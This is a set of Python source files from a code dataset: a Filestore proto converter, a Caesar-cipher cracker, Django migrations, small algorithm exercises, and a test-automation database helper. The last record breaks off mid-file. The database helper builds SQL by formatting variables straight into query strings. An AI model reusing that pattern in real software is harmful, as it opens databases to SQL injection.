name=Primitive.from_proto(resource.name),\n 
capacity_gb=Primitive.from_proto(resource.capacity_gb),\n source_backup=Primitive.from_proto(resource.source_backup),\n nfs_export_options=InstanceFileSharesNfsExportOptionsArray.from_proto(\n resource.nfs_export_options\n ),\n )\n\n\nclass InstanceFileSharesArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [InstanceFileShares.to_proto(i) for i in resources]\n\n @classmethod\n def from_proto(self, resources):\n return [InstanceFileShares.from_proto(i) for i in resources]\n\n\nclass InstanceFileSharesNfsExportOptions(object):\n def __init__(\n self,\n ip_ranges: list = None,\n access_mode: str = None,\n squash_mode: str = None,\n anon_uid: int = None,\n anon_gid: int = None,\n ):\n self.ip_ranges = ip_ranges\n self.access_mode = access_mode\n self.squash_mode = squash_mode\n self.anon_uid = anon_uid\n self.anon_gid = anon_gid\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = instance_pb2.FilestoreBetaInstanceFileSharesNfsExportOptions()\n if Primitive.to_proto(resource.ip_ranges):\n res.ip_ranges.extend(Primitive.to_proto(resource.ip_ranges))\n if InstanceFileSharesNfsExportOptionsAccessModeEnum.to_proto(\n resource.access_mode\n ):\n res.access_mode = InstanceFileSharesNfsExportOptionsAccessModeEnum.to_proto(\n resource.access_mode\n )\n if InstanceFileSharesNfsExportOptionsSquashModeEnum.to_proto(\n resource.squash_mode\n ):\n res.squash_mode = InstanceFileSharesNfsExportOptionsSquashModeEnum.to_proto(\n resource.squash_mode\n )\n if Primitive.to_proto(resource.anon_uid):\n res.anon_uid = Primitive.to_proto(resource.anon_uid)\n if Primitive.to_proto(resource.anon_gid):\n res.anon_gid = Primitive.to_proto(resource.anon_gid)\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceFileSharesNfsExportOptions(\n ip_ranges=Primitive.from_proto(resource.ip_ranges),\n access_mode=InstanceFileSharesNfsExportOptionsAccessModeEnum.from_proto(\n resource.access_mode\n ),\n squash_mode=InstanceFileSharesNfsExportOptionsSquashModeEnum.from_proto(\n resource.squash_mode\n ),\n anon_uid=Primitive.from_proto(resource.anon_uid),\n anon_gid=Primitive.from_proto(resource.anon_gid),\n )\n\n\nclass InstanceFileSharesNfsExportOptionsArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [InstanceFileSharesNfsExportOptions.to_proto(i) for i in resources]\n\n @classmethod\n def from_proto(self, resources):\n return [InstanceFileSharesNfsExportOptions.from_proto(i) for i in resources]\n\n\nclass InstanceNetworks(object):\n def __init__(\n self,\n network: str = None,\n modes: list = None,\n reserved_ip_range: str = None,\n ip_addresses: list = None,\n ):\n self.network = network\n self.modes = modes\n self.reserved_ip_range = reserved_ip_range\n self.ip_addresses = ip_addresses\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = instance_pb2.FilestoreBetaInstanceNetworks()\n if Primitive.to_proto(resource.network):\n res.network = Primitive.to_proto(resource.network)\n if InstanceNetworksModesEnumArray.to_proto(resource.modes):\n res.modes.extend(InstanceNetworksModesEnumArray.to_proto(resource.modes))\n if Primitive.to_proto(resource.reserved_ip_range):\n res.reserved_ip_range = Primitive.to_proto(resource.reserved_ip_range)\n if Primitive.to_proto(resource.ip_addresses):\n res.ip_addresses.extend(Primitive.to_proto(resource.ip_addresses))\n return res\n\n 
@classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceNetworks(\n network=Primitive.from_proto(resource.network),\n modes=InstanceNetworksModesEnumArray.from_proto(resource.modes),\n reserved_ip_range=Primitive.from_proto(resource.reserved_ip_range),\n ip_addresses=Primitive.from_proto(resource.ip_addresses),\n )\n\n\nclass InstanceNetworksArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [InstanceNetworks.to_proto(i) for i in resources]\n\n @classmethod\n def from_proto(self, resources):\n return [InstanceNetworks.from_proto(i) for i in resources]\n\n\nclass InstanceStateEnum(object):\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return resource\n return instance_pb2.FilestoreBetaInstanceStateEnum.Value(\n \"FilestoreBetaInstanceStateEnum%s\" % resource\n )\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return resource\n return instance_pb2.FilestoreBetaInstanceStateEnum.Name(resource)[\n len(\"FilestoreBetaInstanceStateEnum\") :\n ]\n\n\nclass InstanceTierEnum(object):\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return resource\n return instance_pb2.FilestoreBetaInstanceTierEnum.Value(\n \"FilestoreBetaInstanceTierEnum%s\" % resource\n )\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return resource\n return instance_pb2.FilestoreBetaInstanceTierEnum.Name(resource)[\n len(\"FilestoreBetaInstanceTierEnum\") :\n ]\n\n\nclass InstanceFileSharesNfsExportOptionsAccessModeEnum(object):\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return resource\n return instance_pb2.FilestoreBetaInstanceFileSharesNfsExportOptionsAccessModeEnum.Value(\n \"FilestoreBetaInstanceFileSharesNfsExportOptionsAccessModeEnum%s\" % resource\n )\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return resource\n return instance_pb2.FilestoreBetaInstanceFileSharesNfsExportOptionsAccessModeEnum.Name(\n resource\n )[\n len(\"FilestoreBetaInstanceFileSharesNfsExportOptionsAccessModeEnum\") :\n ]\n\n\nclass InstanceFileSharesNfsExportOptionsSquashModeEnum(object):\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return resource\n return instance_pb2.FilestoreBetaInstanceFileSharesNfsExportOptionsSquashModeEnum.Value(\n \"FilestoreBetaInstanceFileSharesNfsExportOptionsSquashModeEnum%s\" % resource\n )\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return resource\n return instance_pb2.FilestoreBetaInstanceFileSharesNfsExportOptionsSquashModeEnum.Name(\n resource\n )[\n len(\"FilestoreBetaInstanceFileSharesNfsExportOptionsSquashModeEnum\") :\n ]\n\n\nclass InstanceNetworksModesEnum(object):\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return resource\n return instance_pb2.FilestoreBetaInstanceNetworksModesEnum.Value(\n \"FilestoreBetaInstanceNetworksModesEnum%s\" % resource\n )\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return resource\n return instance_pb2.FilestoreBetaInstanceNetworksModesEnum.Name(resource)[\n len(\"FilestoreBetaInstanceNetworksModesEnum\") :\n ]\n\n\nclass Primitive(object):\n @classmethod\n def to_proto(self, s):\n if not s:\n return \"\"\n return s\n\n @classmethod\n def from_proto(self, s):\n return 
s\n","sub_path":"python/services/filestore/beta/instance.py","file_name":"instance.py","file_ext":"py","file_size_in_byte":16269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"538558654","text":"# Use frequency analysis to find the key to ciphertext.txt, and then\n# decode it.\n\n# Your code here\ntext = open('ciphertext.txt','r')\nlines = text.read()\ndef cipher(s):\n \n cache = {}\n holder =[]\n cracker=['E', 'T', 'A', 'O', 'H', 'N', 'R', 'I', 'S', 'D', 'L', 'W', 'U',\n 'G', 'F', 'B', 'M', 'Y', 'C', 'P', 'K', 'V', 'Q', 'J', 'X', 'Z']\n crackList={}\n letter = ''\n def cipherCount(s):\n for i in s:\n if i.isalpha():\n if i not in cache:\n cache[i] = [i,1]\n cache[i][1] +=1\n return cache\n\n def getCipher():\n x = cache\n for i in x.values():\n holder.append(i)\n\n cipherCount(s)\n getCipher()\n holder.sort(key=lambda e:e[1], reverse=True)\n \n for i in range(len(holder)-1):\n x = holder[i][0]\n crackList[holder[i][0]] = cracker[i]\n \n\n # print(crackList)g\n for i in lines:\n if i in crackList:\n letter +=crackList[i]\n letter += i\n \n return letter\n\n\n# x = cipher(lines)\n\n# for i in range(2000):\n# t = cipher(x)\n# x = t \n\nprint(cipher(lines))","sub_path":"applications/crack_caesar/crack_caesar.py","file_name":"crack_caesar.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"203907052","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport datetime\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('bot', '0015_auto_20160515_2259'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Conversas',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('date', models.DateTimeField(default=datetime.datetime(2016, 5, 15, 23, 4, 13, 546521, tzinfo=utc))),\n ('question', models.TextField()),\n ('answer', models.TextField()),\n ],\n ),\n migrations.AlterField(\n model_name='chat',\n name='date',\n field=models.DateTimeField(default=datetime.datetime(2016, 5, 15, 23, 4, 13, 545868, tzinfo=utc)),\n ),\n migrations.AddField(\n model_name='conversas',\n name='chat',\n field=models.ForeignKey(to='bot.Chat'),\n ),\n ]\n","sub_path":"bot/migrations/0016_auto_20160515_2304.py","file_name":"0016_auto_20160515_2304.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"187706324","text":"import queue\n\ndef truckTour(petrolpumps):\n # init queue \n route = queue.Queue()\n\n # add all the pumps to the queue \n for p in petrolpumps:\n route.put(p) \n # var to hold the pump we end up starting at \n start = 0\n # var to keep track of the number of pumps we've traversed \n traversed = 0\n # amount of gas we have \n gas = 0\n\n # loop so long as we haven't traversed every single pump \n while traversed < len(petrolpumps):\n # get the next pump along the route \n pump = route.get() \n # add the amount of gas it has available \n gas += pump[0]\n # check if our gas tank has enough to get us \n # to the next pump \n if gas >= pump[1]:\n # increment traversed counter \n traversed += 1\n # decrement by the amount of gas it takes to get there \n gas -= pump[1] \n # if it doesn't, reset our gas tank, the number of pumps\n # we've traversed, and move on to consider the next pump\n 
else:\n # otherwise, starting at the pump we started at \n # isn't a viable option, so let's consider the \n # pump after the one we're currently on \n start += traversed + 1\n # reset traversed counter \n traversed = 0\n # reset gas counter \n gas = 0\n # add the pump to the back of the route \n route.put(pump)\n # at this point, we've found the starting pump that will\n # allow us to traverse all of the pumps; return it\n return start","sub_path":"truck_tour.py","file_name":"truck_tour.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"557358245","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n replaces = [(b'goldenworm', '0001_initial'), (b'goldenworm', '0002_auto_20150808_0006'), (b'goldenworm', '0003_auto_20150810_2140'), (b'goldenworm', '0004_remove_stage_index'), (b'goldenworm', '0006_pathway'), (b'goldenworm', '0007_delete_pathway'), (b'goldenworm', '0008_gene_phenotype')]\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Gene',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('file', models.FileField(help_text=b'GenBank format', upload_to=b'')),\n ('start', models.PositiveIntegerField()),\n ('end', models.PositiveIntegerField()),\n ('strand', models.IntegerField(choices=[(1, b'Forward'), (-1, b'Reverse')])),\n ('name', models.CharField(max_length=100)),\n ('sequence_type', models.CharField(max_length=100, choices=[(b'G', b'Genomic locus'), (b'A', b'Pathway gene'), (b'S', b'Selection cassette')])),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Stage',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('degeneracy', models.CharField(max_length=100)),\n ('name', models.CharField(max_length=100)),\n ('annealable_seq', models.ForeignKey(related_name=b'annealable_seq', to='goldenworm.Gene')),\n ('selection_cassette', models.ForeignKey(related_name=b'selection_cassette', to='goldenworm.Gene')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.RenameField(\n model_name='gene',\n old_name='sequence_type',\n new_name='type',\n ),\n migrations.CreateModel(\n name='InchwormAssembly',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('genome', models.ForeignKey(to='goldenworm.Gene')),\n ('stages', models.ManyToManyField(to=b'goldenworm.Stage')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='gene',\n name='phenotype',\n field=models.CharField(default='', max_length=100, blank=True),\n preserve_default=False,\n ),\n ]\n","sub_path":"goldenworm/migrations/0001_squashed_0008_gene_phenotype.py","file_name":"0001_squashed_0008_gene_phenotype.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"382793537","text":"from random import randrange\r\n\r\n\r\nclass Node:\r\n def __init__(self, name, height):\r\n self.height = height\r\n self.name = name\r\n self.children = []\r\n self.size = 0\r\n\r\n def change_name(self, name):\r\n self.name = name\r\n\r\n def add_child(self, name):\r\n self.size += 1\r\n self.children.append(Node(name, self.height))\r\n\r\n def get_child(self, 
index):\r\n if index < self.size:\r\n return self.children[index]\r\n else:\r\n return False\r\n\r\n def print_children(self):\r\n for child in self.children:\r\n print(child.name, \"-\", child.size, end=\"|\")\r\n\r\n\r\ndef generate_tree(height):\r\n root = Node(1, height)\r\n temp = root\r\n depth = 2\r\n\r\n while temp.name != height:\r\n path = randrange(-1, temp.size)\r\n if path == -1:\r\n temp.add_child(depth)\r\n temp = root\r\n depth = 2\r\n else:\r\n temp = temp.get_child(path)\r\n depth += 1\r\n\r\n return root\r\n\r\n\r\ndef get_branch(tree, tab, n=0):\r\n if len(tab) == 0:\r\n return tree\r\n elif tree.get_child(tab[n]) is False:\r\n return False\r\n elif n < len(tab) - 1:\r\n return get_branch(tree.get_child(tab[n]), tab, n + 1)\r\n else:\r\n return tree.get_child(tab[n])\r\n\r\n\r\ndef print_tree(root):\r\n print(root.name, end=\"~\")\r\n root.print_children()\r\n print(\"\")\r\n\r\n tree_path = [0]\r\n\r\n while len(tree_path) < root.height:\r\n branch = get_branch(root, tree_path)\r\n if branch:\r\n tree_path[-1] += 1\r\n\r\n print(tree_path)\r\n\r\n for index_ in range(len(tree_path), 1, -1):\r\n while not get_branch(root, tree_path[0:index_]):\r\n tree_path[index_] += 1\r\n if tree_path[index_] > get_branch(root, tree_path[0:(index_ - 1)]):\r\n break\r\n\r\n\r\n\r\n\r\ntree_ = generate_tree(3)\r\n\r\nprint_tree(tree_)\r\n","sub_path":"Lista4/zad3.py","file_name":"zad3.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"544833679","text":"#! /usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom library.myglobal import PATH,device_config\nfrom library.db import dbmysql\nfrom library.myglobal import logger\nfrom library import desktop\nimport time\nimport datetime\n\nautodb = dbmysql.MysqlDB(PATH('../config/dbconfig.ini'),'AUTOTEST')\nstagedb = dbmysql.MysqlDB(PATH('../config/dbconfig.ini'),'STAGE')\n\n\ndef filter_cases(suite_id, comp_list, pid):\n\n \"\"\"\n filter test cases according to test suite ID\n :param suite_id:\n :return: result list\n \"\"\"\n comp = []\n for cn in comp_list:\n query = 'select * from TestCaseManage_component where comp_name=\"{0}\" '.format(cn)\n result = autodb.select_one_record(query)\n temp = result[0]['comp_id']\n comp.append(str(temp))\n compstr = ','.join(comp)\n\n query = 'select * from TestCaseManage_testcase where teca_enable=1 and teca_comp_id in ({0}) ' \\\n 'and teca_prod_id in ({1}) and teca_id in (select tsca_teca_id from TestCaseManage_testsuitecase ' \\\n 'where tsca_tesu_id in ({2}))'.format(compstr, pid, suite_id)\n cases = autodb.select_many_record(query)\n if len(cases) == 0:\n logger.warning('There are not test cases')\n return cases\n\n\ndef filter_image_source(vendor):\n\n # get vendor ID\n query = 'select id from resource_vendor where vendor=\"{0}\"'.format(vendor)\n result = autodb.select_one_record(query)\n vid = str(result[0]['id'])\n\n query = 'select A.*, B.alias from resource_image A INNER JOIN resource_verification B ON A.id = B.img_id where B.vendor_id = {0} and B.enable = 1'.format(vid)\n cases = autodb.select_many_record(query)\n if len(cases) == 0:\n logger.warning('There are not test cases')\n return cases\n\n\ndef get_action_list(comp_id):\n\n \"\"\"\n get component is mapping with action\n :param comp_id:\n :return:\n \"\"\"\n\n action_list = []\n\n # query = 'select * from Component where comp_name like \"{0}\" '.format(comp_name)\n # result = autodb.select_one_record(query)\n # comp_id = result[0]['comp_id']\n\n 
query = 'select * from TestCaseManage_actiongroup where acgr_comp_id={0} order by acgr_index'.format(comp_id)\n result = autodb.select_many_record(query)\n\n for re in result:\n\n actid = re['acgr_acti_id']\n query = 'select * from TestCaseManage_action where acti_id={0}'.format(actid)\n result = autodb.select_one_record(query)\n action_list.append(result[0]['acti_name'])\n\n return action_list\n\n\ndef get_comp_name(comp_id):\n\n \"\"\"\n get component name according to id\n :param comp_id:\n :return:\n \"\"\"\n\n query = 'select * from TestCaseManage_component where comp_id={0} '.format(comp_id)\n result = autodb.select_one_record(query)\n comp_name = result[0]['comp_name']\n return comp_name\n\n\ndef get_vp_name(vp_id):\n\n \"\"\"\n get vp name according to id\n :param vp_id:\n :return:\n \"\"\"\n\n query = 'select * from TestCaseManage_vpname where vp_id={0} '.format(vp_id)\n result = autodb.select_one_record(query)\n vp_name = result[0]['vp_name']\n return vp_name\n\n\ndef get_vp_type(vpt_id):\n\n \"\"\"\n get vp type according to id\n :param vpt_id:\n :return:\n \"\"\"\n\n query = 'select * from TestCaseManage_vptype where vpt_id={0} '.format(vpt_id)\n result = autodb.select_one_record(query)\n vpt_name = result[0]['vpt_name']\n return vpt_name\n\n\ndef get_product_name_byID(pid):\n\n \"\"\"\n get product name according to pid\n :param pid:\n :return:\n \"\"\"\n\n query = 'select prod_name from TestCaseManage_product where prod_id={0}'.format(pid)\n result = autodb.select_one_record(query)\n pname = result[0]['prod_name']\n return pname\n\n\ndef get_product_ID_byName(pname):\n\n \"\"\"\n\n :param pname:\n :return:\n \"\"\"\n\n query = \"select prod_id from TestCaseManage_product where prod_name REGEXP '[[:<:]]{0}[[:>:]]'\".format(pname.lower())\n result = autodb.select_many_record(query)\n res = []\n for re in result:\n res.append(str(re['prod_id']))\n return res\n\n\ndef get_memory_info(uid,ts,version,qtype):\n\n if qtype.upper() == 'MAX':\n sql = \"select max(mi_rss) as value from TestCaseManage_meminfo \"\n elif qtype.upper() == 'AVG':\n sql = \"select avg(mi_rss) as value from TestCaseManage_meminfo \"\n else:\n sql = \"select max(mi_rss) as value from TestCaseManage_meminfo \"\n\n sql = sql + \"where mi_uid='{0}' and mi_ver='{1}' and mi_ts='{2}' \" \\\n \"group by mi_uid,mi_ver,mi_ts\".format(uid,version,ts)\n\n result = autodb.select_one_record(sql)\n value = result[0]['value']\n return int(value)\n\n\ndef get_cpu_info(uid,ts,version):\n\n sql = \"select avg(ci_cpu) as value from TestCaseManage_cpuinfo \" +\\\n \"where ci_uid='{0}' and ci_ver='{1}' and ci_ts='{2}' \" \\\n \"group by ci_uid,ci_ver,ci_ts\".format(uid,version,ts)\n\n result = autodb.select_one_record(sql)\n avg_val = result[0]['value']\n\n # get the max value\n sql = \"select max(ci_cpu) as value from TestCaseManage_cpuinfo \" +\\\n \"where ci_uid='{0}' and ci_ver='{1}' and ci_ts='{2}' \" \\\n \"group by ci_uid,ci_ver,ci_ts\".format(uid,version,ts)\n\n result = autodb.select_one_record(sql)\n max_val = result[0]['value']\n\n # get the last 6 CPU values\n sql = \"select sum(test.ci_cpu) as value from (select ci_cpu from TestCaseManage_cpuinfo \" +\\\n \"where ci_uid='{0}' and ci_ver='{1}' and ci_ts='{2}' \" \\\n \"order by ci_id DESC limit 6) as test\".format(uid,version,ts)\n\n result = autodb.select_one_record(sql)\n last_val = result[0]['value']\n\n return [avg_val, max_val, last_val]\n\n\n# just for memory and cpu information\ndef insert_info_to_db(filename,ts,uid,version,dtype):\n\n \"\"\"\n\n :param filename:\n 
:param ts:\n :param uid:\n :return:\n \"\"\"\n with open(filename) as rfile:\n if dtype.upper() == 'MEMORY':\n row = 0\n for ln in rfile:\n if row % 2 == 1:\n row +=1\n continue\n #ln = ' '.join(filter(lambda x: x, ln.split(' ')))\n value = ln.split(':')\n if len(value) > 0:\n temp = value[0].replace('K','')\n pss = temp.replace(',','').strip()\n query = \"insert into TestCaseManage_meminfo(mi_uid,mi_ts,mi_ver,mi_uss,mi_pss) values('{0}','{1}','{2}',{3},{4})\".\\\n format(uid, ts, version, int(0), int(pss))\n result = autodb.execute_insert(query)\n if not result:\n return False\n row +=1\n elif dtype.upper() == 'CPU':\n for ln in rfile:\n ln = ' '.join(filter(lambda x: x, ln.split(' ')))\n value = ln.split(' ')\n if len(value) > 4:\n cpu = value[4].replace('%','')\n cpu = float(cpu)/100\n query = \"insert into TestCaseManage_cpuinfo(ci_uid,ci_ts,ci_ver,ci_cpu) values('{0}','{1}','{2}',{3})\".\\\n format(uid, ts, version, cpu)\n result = autodb.execute_insert(query)\n if not result:\n return False\n\n return True\n\n\ndef insert_runinfo(slist,dname, vname, loop,ltype):\n\n cur_date = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n if ltype.upper() == 'ALL':\n lt = 0\n else:\n lt = 1\n\n query = \"insert into TestCaseManage_runinfo(run_tesu_id,run_device_name,run_build_name,run_date,run_loop_number, run_loop_type, run_name) \" \\\n \"values('{0}','{1}','{2}','{3}',{4},{5}, '{6}')\".format(slist, dname, vname, cur_date, loop, lt, 'qatest')\n autodb.execute_insert(query)\n\n # get new id value\n query = \"select MAX(run_id) from TestCaseManage_runinfo\"\n result = autodb.select_one_record(query)\n id = str(result[0]['MAX(run_id)'])\n\n # update run name\n query = \"\"\n return id\n\n\ndef insert_test_result(run_id, teca_id, lp_num, teca_result, log):\n\n # get suite id\n query = \"select run_tesu_id from TestCaseManage_runinfo where run_id={0}\".format(run_id)\n result = autodb.select_one_record(query)\n sid = result[0]['run_tesu_id'].encode('utf8').split(',')\n\n # get case mapping suite_id\n query = \"select distinct tsca_tesu_id from TestCaseManage_testsuitecase where tsca_teca_id = {0}\".format(teca_id)\n result = autodb.select_many_record(query)\n sid2 = []\n for re in result:\n sid2.append(str(re['tsca_tesu_id']))\n # get insection set\n final_sid = ','.join(list(set(sid) & set(sid2)))\n\n # insert result to db\n cur_date = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n log = log.replace('\\\\', '/')\n query = \"insert into TestCaseManage_testresult(resu_run_id,resu_tesu_id,resu_teca_id,resu_loop,resu_date_time, resu_result, resu_log_info) \" \\\n \"values({0},'{1}',{2},{3},'{4}','{5}','{6}')\".format(run_id, final_sid, teca_id, lp_num, cur_date, teca_result, log)\n autodb.execute_insert(query)\n\n\n# update stage db for module update\ndef update_stage_module_network(mid, exp_network, exp_killself):\n\n updateFlag = False\n query = 'select * from fun_plugin_file where id = {0}'.format(mid)\n result = stagedb.select_one_record(query)\n network = result[0]['network']\n killself = result[0]['killself']\n query = ''\n if exp_network != network or exp_killself != killself:\n query = 'update fun_plugin_file set network = {0},killself={1} where id = {2}'.format(exp_network, exp_killself, mid)\n if query != '':\n stagedb.execute_update(query)\n updateFlag = True\n\n return updateFlag\n\n\n# update stage db for module enalbe/disable\ndef update_stage_module_status(mid, flag):\n\n if flag:\n query = 'update fun_plugin_file set enable = {0} where id = {1}'.format(1, mid)\n 
else:\n query = 'update fun_plugin_file set enable = {0} where id = {1}'.format(0, mid)\n\n stagedb.execute_update(query)\n\n\ndef get_module_info(id):\n\n query = 'select encryption_client_path, encryption_length, encryption_path, encryption_hash from fun_plugin_file where id = {0}'.format(id)\n result = stagedb.select_one_record(query)\n res = {}\n res['path'] = result[0]['encryption_client_path'].encode('utf8')\n res['length'] = str(result[0]['encryption_length'])\n res['url'] = result[0]['encryption_path'].encode('utf8')\n res['hash'] = result[0]['encryption_hash'].encode('utf8')\n res['soft_version'] = result[0]['soft_version']\n return res\n\n\ndef check_amount_limit(mid):\n\n flag = False\n cur_date = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n cur_date = \" \".join([cur_date, \"00:00:00\"])\n start_time = desktop.get_time_stamp(cur_date, 0)\n end_time = desktop.get_time_stamp(cur_date, 1)\n\n query = \"select * from fun_plugin_amount_limit where plugin_file_id= {0} and start_time= {1}\".format(mid, start_time)\n result = stagedb.select_one_record(query)\n if result[0] is None:\n query = \"insert into fun_plugin_amount_limit(plugin_file_id, enable, start_time, end_time, max_get_amount) values({0},1,{1},{2},1000)\".format(mid, start_time,end_time)\n stagedb.execute_insert(query)\n flag = True\n\n return flag\n\n\ndef get_operation_module_info(key, id):\n\n if key.lower() == 'module':\n query = 'select path, length, hash, encryption_path, soft_version from fun_plugin_file where id = {0}'.format(id)\n else:\n query = 'select path, length, hash, client_path,version from fun_upgrade_operation where id = {0}'.format(id)\n result = stagedb.select_one_record(query)\n res = {}\n res['path'] = result[0]['path'].encode('utf8')\n res['length'] = str(result[0]['length'])\n res['hash'] = result[0]['hash'].encode('utf8')\n if key.lower() != 'module':\n res['cpath'] = result[0]['client_path'].encode('utf8')\n res['version'] = result[0]['version']\n else:\n res['cpath'] = result[0]['encryption_path'].encode('utf8')\n res['version'] = result[0]['soft_version']\n return res\n\n\ndef get_all_module_info(conf_dict):\n\n result = {}\n\n for key, value in conf_dict.items():\n if key.lower() == 'c_rule':\n continue\n else:\n result[key] = get_operation_module_info(key, value)\n return result\n\n\ndef update_push_interval(ruleID, value):\n\n interval = int(value)*60*1000\n\n query = \"update fun_wallpaper_limit set sequence={0} where id=-1 and rule_id = {1} and type = '{2}'\".format(str(interval), ruleID, 'push')\n stagedb.execute_update(query)\n\n\ndef update_switch(ruleID, stype, action):\n\n key = ''.join([stype, ':', action.upper()])\n\n # current this id is not changed, so here is hard code\n switcher = {\n 'dev_statistic:OFF': 75,\n 'dev_statistic:ON': 66,\n 'init_operation_module:OFF': 91,\n 'init_operation_module:ON': 89\n }\n id = switcher.get(key, 0)\n\n if id != 0:\n query = \"select * from fun_wallpaper_limit where id={0} and rule_id = {1} and type = '{2}'\".format(id, ruleID, 'switch')\n result = stagedb.select_one_record(query)\n if result[0] is None:\n query = \"insert into fun_wallpaper_limit(id, rule_id, type, enabled, sequence, priority) values({0},{1},'{2}',1,0,0)\".format(id,ruleID, 'switch')\n stagedb.execute_insert(query)\n else:\n query = \"update fun_wallpaper_limit set enabled=1 where id={0} and rule_id = {1} and type = '{2}'\".format(id, ruleID, 'switch')\n stagedb.execute_update(query)\n if id == 75 or id == 66:\n diff_id = list(set([75,66]) - set([id]))\n if id == 91 or id 
== 89:\n diff_id = list(set([91,89]) - set([id]))\n\n query = \"update fun_wallpaper_limit set enabled=0 where id={0} and rule_id = {1} and type = '{2}'\".format(diff_id[0], ruleID, 'switch')\n stagedb.execute_update(query)\n\n # update switch\n update_switch_time()\n\n\ndef start_c_process(ruleID, action):\n\n updateFlag = False\n query = \"select * from fun_wallpaper_limit where id={0} and rule_id = {1} and type = '{2}'\".format(7, ruleID, 'upgrade_c_setup')\n result = stagedb.select_one_record(query)\n value = result[0]['enabled']\n\n query = ''\n if action != value:\n query = \"update fun_wallpaper_limit set enabled={0} where id={1} and rule_id = {2} and type = '{3}'\".format(action, 7, ruleID, 'upgrade_c_setup')\n\n if query != '':\n stagedb.execute_update(query)\n updateFlag = True\n\n return updateFlag\n\n\n# update stage db for operation module\n# value format: wifi:killself\ndef update_operation_module(mid, exp_network, exp_killself, exp_enabled):\n\n updateFlag = False\n query = 'select * from fun_upgrade_operation where id = {0}'.format(mid)\n result = stagedb.select_one_record(query)\n network = result[0]['network_type']\n killself = result[0]['killself']\n enabled = result[0]['enable']\n query = ''\n if exp_network != network or exp_killself != killself or exp_enabled != enabled:\n query = 'update fun_upgrade_operation set network_type = {0},killself={1}, enable={2} where id = {3}'.format(exp_network, exp_killself, exp_enabled, mid)\n\n if query != '':\n stagedb.execute_update(query)\n updateFlag = True\n\n return updateFlag\n\n\ndef update_switch_time():\n\n t = time.time()\n timestamp = (int(round(t * 1000)))\n query = \"update fun_push_public set time={0} where type='{1}'\".format(timestamp, 'switch')\n stagedb.execute_update(query)\n\n\nif __name__ == '__main__':\n\n #insert_info_to_db(r'E:\\\AutoTestFrame\\\log\\\20170817\\\ZX1G22TG4F_\\\1801TestMemory\\\test_memory_cpu_1_0_1','201708081629','ZX1G22TG4F','2.01','memory')\n #value = get_memory_info('ZX1G22TG4F', '201708081629', '1.01', 'avg')\n #update_switch('3423', 'dev_statistic', 'off')\n #insert_test_result(7, 1, 3, 'pass', '/test/log.txt')\n\n import csv\n\n with open(r'E:\\\work\\\vivo.csv') as rfile:\n reader = csv.reader(rfile)\n for line in reader:\n #name = unicode(line[0],'gbk')\n #query = 'insert resource_image(name,fid,xml_id) values(\"{0}\",{1},{2})'.format(name, line[1], line[2])\n query = 'insert resource_verification(vendor_id, img_id, enable) values({0},{1},{2})'.format(line[3],line[4],line[5])\n autodb.execute_insert(query)\n pass\n","sub_path":"business/querydb.py","file_name":"querydb.py","file_ext":"py","file_size_in_byte":16340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"610224240","text":"class Solution:\n def permuteUnique(self, nums: List[int]) -> List[List[int]]:\n\n def _dfs(nums, subset, output):\n if not nums:\n if subset not in output:\n output.append(subset)\n return\n\n for i in range(len(nums)):\n # Handles duplicates. 
